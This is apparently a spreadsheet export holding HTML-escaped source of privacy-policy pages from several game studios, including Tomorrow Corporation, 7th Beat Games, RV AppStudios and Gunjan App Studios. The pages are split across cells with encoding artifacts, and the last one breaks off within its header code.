&lt;p&gt; We do not explicitly collect analytics, but our web hosting provider &lt;a href="https://www.dreamhost.com"&gt;Dreamhost&lt;/a&gt; keeps raw web server logs for 3 days.&lt;/p&gt;
&lt;h2&gt; Who we share your data with&lt;/h2&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We do not share your data.&lt;/p&gt;
&lt;h2&gt;How long we retain your data&lt;/h2&gt;
&lt;p&gt;If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.&lt;/p&gt;
&lt;p&gt;For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username).</t>
  </si>
  <si>
    <t>Website administrators can also see and edit that information.&lt;/p&gt;
&lt;h2&gt; What rights you have over your data&lt;/h2&gt;
&lt;p&gt;If you have an account on this site, or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you.</t>
  </si>
  <si>
    <t>This does not include any data we are obliged to keep for administrative, legal, or security purposes.&lt;/p&gt;
&lt;h2&gt;Where we send your data&lt;/h2&gt;
&lt;p&gt;Visitor comments may be checked through an automated spam detection service.&lt;/p&gt;
&lt;h2&gt; Our contact information&lt;/h2&gt;
&lt;p&gt;This fine location here: &lt;img decoding="async" class="alignnone size-full wp-image-1810" src="https://tomorrowcorporation.com/blog/wp-content/uploads/2012/11/tc_contact.png" alt="" width="223" height="16" /&gt;&lt;/p&gt;
&lt;h2&gt; Our mailing list&lt;/h2&gt;
&lt;p&gt;Anyone is welcome to sign up for our email list.</t>
  </si>
  <si>
    <t>This list is opt-in. You can unsubscribe at any time, using the link included in each email.&lt;/p&gt;
&lt;h2&gt;Our Games&lt;/h2&gt;
&lt;p&gt;Our games do not collect any information, by default. Some versions of the games allow players to optionally connect to their platform&amp;#8217;s games service to collect achievements or submit scores.</t>
  </si>
  <si>
    <t>Android versions optionally connect to Google&amp;#8217;s Play Games service (https://play.google.com). Apple iOS versions optionally connect to Apple&amp;#8217;s Gamecenter service (https://www.apple.com/legal/internet-services/itunes/gamecenter/). Steam versions optionally connect to Steam&amp;#8217;s service (https://store.steampowered.com/privacy_agreement/).</t>
  </si>
  <si>
    <t>If you choose to connect to these services, we do not control how these services use or store your data.&lt;/p&gt;
&lt;p&gt;Some special cases:&lt;/p&gt;
&lt;p&gt;Win / Mac / Linux versions of Little Inferno: Inside your Little Inferno Entertainment Fireplace, you can optionally use the &amp;#8220;My Pictures&amp;#8221; item to retrieve images from your social networks. If you decide to connect to your social network account, the game will 1. retrieve photos on your behalf, 2. store them locally as a part of your save data, and then 3. delete them when the image is burned in the fireplace. Have fun!&lt;/p&gt;
&lt;p&gt;&lt;img decoding="async" loading="lazy" class="alignnone size-full wp-image-1100" title="ToastyHatsworthPhoto" src="http://tomorrowcorporation.com/blog/wp-content/uploads/2012/11/ToastyHatsworthPhoto.jpg" alt="" width="575" height="261" srcset="https://tomorrowcorporation.com/blog/wp-content/uploads/2012/11/ToastyHatsworthPhoto.jpg 575w, https://tomorrowcorporation.com/blog/wp-content/uploads/2012/11/ToastyHatsworthPhoto-300x136.jpg 300w" sizes="(max-width: 575px) 100vw, 575px" /&gt;&lt;/p&gt;
								_x005F_x000D_
				&lt;div&gt;_x005F_x000D_
									&lt;/div&gt;_x005F_x000D_
			&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
				_x005F_x000D_
		&lt;/div&gt;_x005F_x000D_
		&lt;div class="entryEnd"&gt;&lt;/div&gt;_x005F_x000D_
	_x005F_x000D_
		_x005F_x000D_
_x005F_x000D_
&lt;/div&gt;	&lt;!-- end content div started in header --&gt;
&lt;div class="clear"&gt;&lt;/div&gt;
&lt;/div&gt;	&lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">end "torso" --&gt;
&lt;div id="footer"&gt;
	&lt;img src="https://tomorrowcorporation.com/blog/wp-content/themes/tcTheme2/images/tc_foot.jpg" /&gt;
&lt;/div&gt;
&lt;/div&gt;	&lt;!-- end "page" --&gt;
&lt;script type='text/javascript' src='https://tomorrowcorporation.com/blog/wp-includes/js/comment-reply.min.js?ver=b1eb42474d09240aa08579e0bb84f505' id='comment-reply-js'&gt;&lt;/script&gt;
&lt;div style="color:#888888; background-color:#2b2b2b; text-align:center; padding:8px; font-size:12px;"&gt;
&lt;a href="/feed"&gt;subscribe to the rss feed&lt;/a&gt;
|
&lt;a href="/"&gt;blog&lt;/a&gt;
|
&lt;a href="/games"&gt;our games&lt;/a&gt;
|
&lt;a href="/about"&gt;about Tomorrow Corporation&lt;/a&gt;
|
&lt;a href="/important-privacy-policy"&gt;privacy policy&lt;/a&gt;
&lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>&lt;html&gt;
&lt;head&gt;
    &lt;meta charset="utf-8"&gt;
    &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"&gt;
    &lt;title&gt;7th Beat Games&lt;/title&gt;
    &lt;link rel="stylesheet" href="css/indexNew.css"&gt;
    &lt;link rel="icon"
          type="image/png"
          href="https://7thbe.at/favicon.png"&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;div class="home-container"&gt;
    &lt;div class="home-header"&gt;
        &lt;div class="logo"&gt;
            &lt;a href="https://7thbe.at"&gt;
                &lt;img src="https://7thbe.at/images/logo_vibrant.svg" alt="logo"/&gt;
            &lt;/a&gt;
         &lt;/div&gt;
    &lt;/div&gt;
    &lt;h1 class="title-text real-bold"&gt;
        &lt;div&gt;Privacy Policy&lt;/div&gt;
    &lt;/h1&gt;
    &lt;div id="privacy" class="single-section privacy-section"&gt;
        &lt;div class="section-inside"&gt;
            &lt;div class="section-text"&gt;
                &lt;p&gt;
                    7th Beat Games built the A Dance of Fire and Ice game as a Commercial app.</t>
  </si>
  <si>
    <t xml:space="preserve">This SERVICE is provided by 7th Beat Games and is intended for use as is.
                 &lt;/p&gt;
                &lt;p&gt;
                     This page is used to inform visitors regarding our policies with the collection, use, and disclosure of Personal Information if anyone decided to use our Service.
                </t>
  </si>
  <si>
    <t>&lt;/p&gt;
                &lt;p&gt;
                    7th Beat Games does not collect user information while they use our Service.
                 &lt;/p&gt;
                &lt;br&gt;&lt;br&gt;&lt;p class="bold"&gt;Log Data&lt;/p&gt;
                &lt;p&gt;
                     We want to inform you that whenever you use our Service, in a case of an error in the app we collect data and information (through third party products) on your phone called Log Data.</t>
  </si>
  <si>
    <t xml:space="preserve">This Log Data may include information such as your device Internet Protocol (&amp;#34;IP&amp;#34;) address, device name, operating system version, the configuration of the app when utilizing our Service, the time and date of your use of the Service, and other statistics.
                 &lt;/p&gt;
                &lt;!--
                &lt;br&gt;&lt;br&gt;&lt;p class="bold"&gt;Service Providers&lt;/p&gt;
                &lt;p&gt;
                </t>
  </si>
  <si>
    <t>We may employ third-party companies and individuals due to the following reasons:
                &lt;/p&gt;
                &lt;p&gt;
                To facilitate our Service;
                To provide the Service on our behalf;
                To perform Service-related services; or
                To assist us in analyzing how our Service is used.
                 We want to inform users of this Service that these third parties have access to your Personal Information. The reason is to perform the tasks assigned to them on our behalf.</t>
  </si>
  <si>
    <t>However, they are obligated not to disclose or use the information for any other purpose.
                 &lt;/p&gt;
                --&gt;
                &lt;br&gt;&lt;br&gt;&lt;p class="bold"&gt;Changes to This Privacy Policy&lt;/p&gt;
                &lt;p&gt;
                     We may update our Privacy Policy from time to time.</t>
  </si>
  <si>
    <t xml:space="preserve">Thus, you are advised to review this page periodically for any changes. We will notify you of any changes by posting the new Privacy Policy on this page. These changes are effective immediately after they are posted on this page.
                </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
                &lt;br&gt;&lt;br&gt;&lt;p class="bold"&gt;Contact Us&lt;/p&gt;
                &lt;p&gt;
                    If you have any questions or suggestions about our Privacy Policy, do not hesitate to contact us at &lt;a href="mailto:kyle@7thbe.at" style="color:white;"&gt;kyle@7thbe.at&lt;/a&gt;.
                 &lt;/p&gt;
            &lt;/div&gt;
        &lt;/div&gt;
    &lt;/div&gt;
&lt;/div&gt;
&lt;div class="footer"&gt;
    &lt;div class="footer-image"&gt;
        &lt;img src="https://7thbe.at/images/samurai.gif"/&gt;
    &lt;/div&gt;
&lt;/div&gt;
&lt;/body&gt;
&lt;script&gt;
&lt;/script&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">﻿&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;_x005F_x000D_
&lt;html xmlns="http://www.w3.org/1999/xhtml"&gt;_x005F_x000D_
   &lt;head&gt;_x005F_x000D_
      &lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /&gt;_x005F_x000D_
      &lt;meta name="viewport" content="width=device-width, initial-scale=1.0" /&gt;_x005F_x000D_
      &lt;title&gt;RV AppStudios - Games&lt;/title&gt;_x005F_x000D_
      &lt;link rel="stylesheet" type="text/css" href="css_policy/style.css?version=55" /&gt;_x005F_x000D_
      &lt;link rel="stylesheet" href="css_policy/bootstrap.min.css?version=55" rel="stylesheet" /&gt;_x005F_x000D_
      &lt;link href="css_policy/responsive.css?version=55" rel="stylesheet" media="screen" type="text/css" /&gt;_x005F_x000D_
      &lt;link rel="icon" type="image/png" href="https://www.rvappstudios.com/images/rv_128.png"&gt;_x005F_x000D_
      &lt;link rel="stylesheet" href="css_policy/jquery.sidr.dark.css?version=55"&gt;_x005F_x000D_
      &lt;script src="css_policy/jquery.min.js?version=55"&gt;&lt;/script&gt;_x005F_x000D_
      &lt;script src="css_policy/jquery.sidr.min.js?version=55"&gt;&lt;/script&gt;_x005F_x000D_
      &lt;style type="text/css"&gt;_x005F_x000D_
         ul.nav-mytabs li a.active {_x005F_x000D_
         background-color: #e14e4e;_x005F_x000D_
         color: #fff;_x005F_x000D_
         display: block;_x005F_x000D_
         border-right: 4px solid #e14e4e;_x005F_x000D_
         }_x005F_x000D_
      &lt;/style&gt;_x005F_x000D_
   &lt;/head&gt;_x005F_x000D_
   &lt;body&gt;_x005F_x000D_
    _x005F_x000D_
      &lt;div id="fi-story"&gt;_x005F_x000D_
         &lt;div class="header" id="header"&gt;_x005F_x000D_
            &lt;div &gt;_x005F_x000D_
               &lt;div class="container"&gt;_x005F_x000D_
                  &lt;div class="logo-menu"&gt;_x005F_x000D_
                     &lt;div class="logo"&gt;_x005F_x000D_
                        &lt;h1&gt;&lt;a href="https://www.rvappstudios.com/"&gt;&lt;img src="images/rv-logo.png" /&gt;&lt;/a&gt;&lt;/h1&gt;_x005F_x000D_
                     &lt;/div&gt;_x005F_x000D_
                     &lt;div id="mobile-header" style="top:0px;"&gt;_x005F_x000D_
                        &lt;a class="responsive-menu-button" href="#"&gt;&lt;img src="images/11.png" /&gt;&lt;/a&gt;_x005F_x000D_
                     &lt;/div&gt;_x005F_x000D_
                     &lt;div class="menu" id="navigation"&gt;_x005F_x000D_
                        &lt;ul&gt;_x005F_x000D_
                           &lt;li&gt;&lt;a href="https://www.rvappstudios.com/"&gt;Home&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                           &lt;li&gt;&lt;a href="https://www.rvappstudios.com/kidsapp.html"&gt;Kids Apps&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                           &lt;li&gt;&lt;a href="https://www.rvappstudios.com/games.html"&gt;Games&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                           &lt;li&gt;&lt;a href="https://www.rvappstudios.com/app.html"&gt;Apps&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                           &lt;li&gt;&lt;a href="https://www.rvappstudios.com/our-story.html"&gt;Our Story&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                           &lt;li&gt;&lt;a href="https://www.rvappstudios.com/contact.php"&gt;Contact&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                        &lt;/ul&gt;_x005F_x000D_
                     &lt;/div&gt;_x005F_x000D_
                  &lt;/div&gt;_x005F_x000D_
               &lt;/div&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
         &lt;/div&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
    _ x000D_
_x005F_x000D_
      &lt;div style="width:100%;"&gt;_x005F_x000D_
         &lt;section id="main-wrapper"&gt;_x005F_x000D_
            &lt;div class="container"&gt;_x005F_x000D_
               &lt;p&gt;&amp;nbsp;&lt;/p&gt;_x005F_x000D_
               &lt;div class="desc"&gt;_x005F_x000D_
                  &lt;h2 style="color: #000"&gt;KIDS GAMES PRIVACY POLICY&lt;/h2&gt;_x005F_x000D_
               &lt;/div&gt;_x005F_x000D_
              _x005F_x000D_
               &lt;div&gt;_x005F_x000D_
                 _x005F_x000D_
                  &lt;p class="box-desc" style="text-align:inherit;"&gt;_x005F_x000D_
                     </t>
  </si>
  <si>
    <t>Your privacy is important to RV AppStudios and we are committed to protecting the privacy of parents and kids. Please take a moment to familiarize yourself with our privacy practices. _x005F_x000D_
                  &lt;/p&gt;_x005F_x000D_
               &lt;/div&gt;_x005F_x000D_
               &lt;div&gt;_x005F_x000D_
                 _</t>
  </si>
  <si>
    <t>x000D_
                  &lt;p class="box-desc" style="text-align:inherit;"&gt;_x005F_x000D_
                     RV AppStudios uses and makes all attempts to protect all information when you use our apps &amp; services._x005F_x000D_
                  &lt;/p&gt;_x005F_x000D_
               &lt;/div&gt;_x005F_x000D_
               &lt;div&gt;_x005F_x000D_
                 _ x000D_
                  &lt;p class="box-desc" style="text-align:inherit;"&gt;_x005F_x000D_
                     If you do not agree to this Privacy Policy, please do not use the service. We reserve the right to make changes to this Privacy Policy.</t>
  </si>
  <si>
    <t xml:space="preserve">If we make a material change to this Privacy Policy, we will notify you by posting the change in this Privacy Policy. Please check back from time to time to ensure that you are aware of these changes. Your continued use of the Service will signify your acceptance of these changes.  </t>
  </si>
  <si>
    <t>_ x000D_
                  &lt;/p&gt;_x005F_x000D_
               &lt;/div&gt;_x005F_x000D_
               &lt;div&gt;_x005F_x000D_
                  &lt;p class="font02"&gt;Personal Data Collected:&lt;/p&gt;_x005F_x000D_
                  &lt;p class="box-desc" style="text-align:inherit;"&gt;_x005F_x000D_
                      We use technologies like cookies on our website (small files stored by your browser or operating system), web beacons, or unique device identifiers to anonymously identify your computer or device.</t>
  </si>
  <si>
    <t>Our systems also logs information like your browser, operating system, IP address and anonymous usage data so we can deliver a better experience. We do not sell, trade, or rent Users personal identification information to others._x005F_x000D_
                  &lt;/p&gt;_x005F_x000D_
               &lt;/div&gt;_x005F_x000D_
               &lt;div&gt;_x005F_x000D_
                  &lt;p class="font02"&gt;Non-personal Data:&lt;/p&gt;_x005F_x000D_
                  &lt;p class="box-desc" style="text-align:inherit;"&gt;_x005F_x000D_
                      For purposes of this Privacy Policy, "non-personal data" means information that does not directly identify you.</t>
  </si>
  <si>
    <t xml:space="preserve">Additionally, non-personal data means "aggregate" and "de-personalized" information, which is data RV AppStudios collects about the use of RV AppStudios users, from which any personally identifiable data has been removed._x005F_x000D_
                  &lt;/p&gt;_x005F_x000D_
               &lt;/div&gt;_x005F_x000D_
               &lt;div&gt;_x005F_x000D_
                  &lt;p class="font02"&gt;App Store and Data Collection:&lt;/p&gt;_x005F_x000D_
                  &lt;p class="box-desc" style="text-align:inherit;"&gt;_x005F_x000D_
                      We currently do not serve any third party advertisements, except for our own games on a limited basis to parents from time to time._x005F_x000D_
                  &lt;/p&gt;_x005F_x000D_
               &lt;/div&gt;_x005F_x000D_
               &lt;div&gt;_x005F_x000D_
                  &lt;p class="box-desc" style="text-align:inherit;"&gt;_x005F_x000D_
                     We make the toddler focused games available via app stores such as Apple’s App Store, Google Play, Amazon AppStore, and Windows Store’s. While using the game, the App Store may use cookies, unique device identifier codes, software and hardware information, browser information, time zone and usage information or other technology to collect and process the information about you, and we may have access to it.  </t>
  </si>
  <si>
    <t>We have no control over an App Store’s collection or use of information and cannot change what information is made available to us by the App Store._x005F_x000D_
                  &lt;/p&gt;_x005F_x000D_
               &lt;/div&gt;_x005F_x000D_
               &lt;div&gt;_x005F_x000D_
                  &lt;p class="box-desc" style="text-align:inherit;"&gt;_x005F_x000D_
                      If you do not want to be subject to these technologies, do not use or access our Services._x005F_x000D_
                  &lt;/p&gt;_x005F_x000D_
               &lt;/div&gt;_x005F_x000D_
               &lt;div&gt;_x005F_x000D_
                  &lt;p class="font02"&gt;Information Disclosure &amp; Security:&lt;/p&gt;_x005F_x000D_
                  &lt;p class="box-desc" style="text-align:inherit;"&gt;_x005F_x000D_
                      In the following circumstances, we may disclose your personal information according to your wish or regulations by law:_x005F_x000D_
                  &lt;/p&gt;_x005F_x000D_
               &lt;/div&gt;_x005F_x000D_
               &lt;div&gt;_x005F_x000D_
                 _</t>
  </si>
  <si>
    <t>x000D_
                  &lt;div style="position: relative;_x005F_x000D_
                          right: -15px;"&gt;_x005F_x000D_
                          &lt;ul class="dics-list" &gt;_x005F_x000D_
                             &lt;li class="dics-list"&gt;Your prior permission.&lt;/li&gt;_x005F_x000D_
                             &lt;li class="dics-list"&gt;By the applicable law within or outside your country of residence, legal process, litigation requests.&lt;/li&gt;_x005F_x000D_
                             &lt;li class="dics-list"&gt;By requests from public and governmental authorities.&lt;/li&gt;_x005F_x000D_
                             &lt;li&gt;To protect our legal rights and interests. We take reasonable steps to secure your information against unauthorized access or disclosure. _</t>
  </si>
  <si>
    <t xml:space="preserve">x000D_
                               We encrypt transmission of data on pages where you provide payment information. However, no security or encryption method can be guaranteed to protect information from hackers or human error.&lt;/li&gt;_x005F_x000D_
                          &lt;/ul&gt;_x005F_x000D_
                       &lt;/div&gt;_x005F_x000D_
               &lt;/div&gt;_x005F_x000D_
               &lt;div&gt;_x005F_x000D_
                  &lt;p class="font02"&gt;Contacting Us:&lt;/p&gt;_x005F_x000D_
                  &lt;p class="box-desc" style="text-align:inherit;"&gt;_x005F_x000D_
                     </t>
  </si>
  <si>
    <t>If you have any questions regarding the Privacy Policy, please contact us at the following email address.&lt;/span&gt;&lt;br/&gt; &lt;a href="mailto:app_support@rvappstudios.com" style="color:#38B9EC" class="game-policy"&gt;app_support@rvappstudios.com&lt;/a&gt;_x005F_x000D_
                  &lt;/p&gt;_x005F_x000D_
               &lt;/div&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
           &lt;/section&gt; _x005F_x000D_
      &lt;/div&gt; _x005F_x000D_
_x005F_x000D_
    _x005F_x000D_
_x005F_x000D_
      &lt;div style="background-color:#212121; padding-bottom:10px; width: 100%;_x005F_x000D_
         float: left; padding: 20px 0px; text-align: center;"&gt;_x005F_x000D_
         &lt;div class="container"&gt;_x005F_x000D_
            &lt;div class="features-section-area"&gt;_x005F_x000D_
               &lt;ul style="position: relative;_x005F_x000D_
                  top: -4px;"&gt;_x005F_x000D_
                  &lt;li&gt;_x005F_x000D_
                     &lt;p class="copyright right_footer" style="font-size:15px; padding-top:12px; color:#fff;"&gt;Copyright © 2023 RV AppStudios LLC&lt;/p&gt;_x005F_x000D_
                  &lt;/li&gt;_x005F_x000D_
                  &lt;li&gt;_x005F_x000D_
                  &lt;/li&gt;_x005F_x000D_
                  &lt;li&gt;_x005F_x000D_
                     &lt;div style="margin-top: 10px;" class="left_footer"&gt;_x005F_x000D_
                        &lt;a href="https://www.rvappstudios.com/contact.php"&gt;contact&lt;/a&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;a href="https://www.rvappstudios.com/"&gt;Home&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="https://www.rvappstudios.com/games.html"&gt;games&lt;/i&gt;&lt;/a&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="https://www.rvappstudios.com/app.html"&gt;apps&lt;/a&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href="https://www.rvappstudios.com/privacypolicy.html"&gt;Privacy Policy&lt;/a&gt;_x005F_x000D_
                     &lt;/div&gt;_x005F_x000D_
                  &lt;/li&gt;_x005F_x000D_
               &lt;/ul&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
         &lt;/div&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
     _ x000D_
      &lt;script type="text/javascript" src="css_policy/jquery.nicescroll.min.js"&gt;&lt;/script&gt;_x005F_x000D_
      &lt;script type="text/javascript"&gt;_x005F_x000D_
         $(document).ready(function() {_x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         _</t>
  </si>
  <si>
    <t>x000D_
         $('#simple-menu').sidr({_x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         side: 'right'_x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         });_x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         });_x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         $('.responsive-menu-button').sidr({_x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         name: 'sidr-main',_x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         source: '#navigation',_x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         side: 'right'_x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         });_x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         $(document).ready(_x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         function() {_x005F_x000D_
         _x005F_x000D_
         $("html").niceScroll({cursorborder:"0px solid #fff",cursorwidth:"5px",scrollspeed:"70"});_x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         }_x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         );_x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
         _x005F_x000D_
      &lt;/script&gt;_x005F_x000D_
 _x005F_x000D_
   &lt;/body&gt;_x005F_x000D_
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
    &lt;meta charset="utf-8"&gt;
    &lt;!-- &lt;meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"&gt; --&gt;
&lt;meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0"&gt;
&lt;meta name="apple-mobile-web-app-capable" content="yes"&gt;
                    &lt;meta name="description" content="Privacy Policy"&gt;
        &lt;title&gt;Privacy Policy&lt;/title&gt;
    &lt;!-- All CSS --&gt;
&lt;link rel="stylesheet" type="text/css" href="https://gunjanappstudios.com/public/frontend/css/main.css"&gt;
&lt;link rel="stylesheet" href="https://gunjanappstudios.com/public/frontend/css/bootstrap.min.css"&gt;
&lt;link rel="stylesheet" href="https://gunjanappstudios.com/public/frontend/css/animate.min.css"&gt;
&lt;link rel="stylesheet" href="https://gunjanappstudios.com/public/frontend/css/magnific-popup.css"&gt;
&lt;link rel="stylesheet" href="https://gunjanappstudios.com/public/frontend/css/owl.carousel.min.css"&gt;
&lt;link rel="stylesheet" href="https://gunjanappstudios.com/public/frontend/css/jquery.dataTables.min.css"&gt;
&lt;link rel="stylesheet" href="https://gunjanappstudios.com/public/frontend/css/select2.min.css"&gt;
&lt;link rel="stylesheet" href="https://gunjanappstudios.com/public/frontend/css/select2-bootstrap.min.css"&gt;
&lt;link rel="stylesheet" href="https://gunjanappstudios.com/public/frontend/css/meanmenu.css"&gt;
&lt;link rel="stylesheet" href="https://gunjanappstudios.com/public/frontend/css/toastr.min.css"&gt;
&lt;link rel="stylesheet" href="https://gunjanappstudios.com/public/frontend/css/all.css"&gt;
&lt;link rel="stylesheet" href="https://gunjanappstudios.com/public/frontend/css/style.css"&gt;
&lt;link rel="stylesheet" href="https://gunjanappstudios.com/public/frontend/css/responsive.css"&gt;
&lt;link rel="stylesheet" href="https://gunjanappstudios.com/public/frontend/css/spacing.css"&gt;
&lt;link rel="stylesheet" href="https://gunjanappstudios.com/public/frontend/css/cookieconsent.min.css"&gt;
&lt;script src='https://www.google.com/recaptcha/api.js'&gt;&lt;/script&gt;
&lt;link rel="stylesheet" type="text/css" href="https://gunjanappstudios.com/public/layerslider/layerslider.css"&gt;
&lt;style&gt;
    #preloader #status {
        background-image: url(https://gunjanappstudios.com/public/uploads/preloader.gif);
    }
    .top,
    .main-nav nav .navbar-nav .nav-item .dropdown-menu,
    .video-button:before,
    .video-button:after,
    .special .read-more a,
    .service .read-more a,
    .testimonial-bg,
    .project .read-more a,
    .team-text,
    .cta</t>
  </si>
  <si>
    <t>.overlay,
    .blog-area .blog-image .date,
    .blog-area .read-more a,
    .newsletter-area .overlay,
    .footer-social-link ul li a,
    .scroll-top,
    .single-section .read-more a,
    .sidebar .widget .search button,
    .comment button,
    .contact-item:hover .contact-icon,
    .product-item .text button,
    .btn-arf,
    .project-photo-carousel .owl-nav .owl-prev,
    .project-photo-carousel .owl-nav .owl-next,
    .faq h4.panel-title a,
    .team-social li a:hover,
    .doc_detail_social li</t>
  </si>
  <si>
    <t>i,
    .nav-doctor .nav-link.active {
        background: #3867D6!important;
    }
    .main-nav nav .navbar-nav .nav-item a:hover,
    .main-nav nav .navbar-nav .nav-item:hover a,
    .service .service-item .text h3 a:hover,
    .project .project-item .text h3 a:hover,
    .blog-area .blog-item h3 a:hover,
    .footer-item ul li a:hover,
    .sidebar .widget .type-2 ul li a:hover,
    .sidebar .widget</t>
  </si>
  <si>
    <t>.type-1 ul li:before,
    .sidebar .widget .type-1 ul li</t>
  </si>
  <si>
    <t>a:hover,
    .single-section h3,
    .contact-icon,
    .product-item .text h3 a:hover,
    .career-main-item h3,
    .reg-login-form .new-user a {
        color: #3867D6!important;
    }
    .text-animated li a:hover,
    .feature .feature-item {
        background-color: #3867D6!important;
    }
    .text-animated li a:hover,
    .special .read-more a,
    .footer-social-link ul li a,
    .contact-item:hover .contact-icon,
    .faq h4.panel-title,
    .team-social li a:hover {
        border-color: #3867D6!important;
    }
    .main-nav nav .navbar-nav .nav-item .dropdown-menu li a,
    .contact-item:hover .contact-icon {
        color: #fff!important;
    }
    .feature .feature-item:hover,
    .service .read-more a:hover,
    .project .read-more a:hover,
    .blog-area .read-more a:hover,
    .single-section .read-more a:hover,
    .comment button:hover,
    .doc_detail_social li:hover i {
        background: #333!important;
    }
    .footer-social-link ul li a:hover {
        background: transparent!important;
    }
    .special .read-more a:hover {
        background: transparent!important;
        border-color: #fff!important;
    }
&lt;/style&gt;
&lt;!-- Add this script to your header --&gt;
&lt;script type="text/javascript"&gt;
// $( document ).ready(function() {
    var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') &gt; -1;
    if(is_chrome){
    document.write('&lt;link rel="stylesheet" href="https://gunjanappstudios.com/public/frontend/css/chrom-style.css" type="text/css" /&gt;');
    }
// });
&lt;/script&gt;
    &lt;!--</t>
  </si>
  <si>
    <t>Favicon --&gt;
    &lt;link href="https://gunjanappstudios.com/public/uploads/favicon.png" rel="shortcut icon" type="image/png"&gt;
    &lt;!-- Google Font --&gt;
    &lt;link href="https://fonts.googleapis.com/ css2?family=Sen:wght@400;700&amp;display=swap" rel="stylesheet"&gt;
    &lt;!--</t>
  </si>
  <si>
    <t>Global site tag (gtag.js) - Google Analytics --&gt;
&lt;!-- &lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-84213520-6"&gt;&lt;/script&gt; --&gt;
&lt;!-- &lt;script&gt;
    window.dataLayer</t>
  </si>
  <si>
    <t>&lt;script src="https://gunjanappstudios.com/public/frontend/js/jquery-3.5.1.min.js"&gt;&lt;/script&gt; --&gt;
&lt;!-- &lt;script src="https://gunjanappstudios.com/public/frontend/js/bootstrap.bundle.min.js"&gt;&lt;/script&gt; --&gt;
&lt;script src="https://gunjanappstudios.com/public/frontend/js/jquery.magnific-popup.min.js"&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/frontend/js/owl.carousel.min.js"&gt;&lt;/script&gt;
 &lt;script src="https://gunjanappstudios.com/public/frontend/js/wow.min.js"&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/frontend/js/jquery.meanmenu.js"&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/frontend/js/waypoints.min.js"&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/frontend/js/jquery.counterup.min.js"&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/frontend/js/jquery.dataTables.min.js"&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/frontend/js/select2.full.js"&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/frontend/js/toastr.min.js"&gt;&lt;/script&gt;
&lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/Swiper/4.5.0/js/swiper.min.js"&gt;&lt;/script&gt;
&lt;script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/vue/2.6.7/vue.min.js"&gt;&lt;/script&gt; --&gt;
&lt;!--  &lt;script src="https://gunjanappstudios.com/public/layerslider/jquery.layerslider.min.js"&gt;&lt;/script&gt;
 --&gt; 
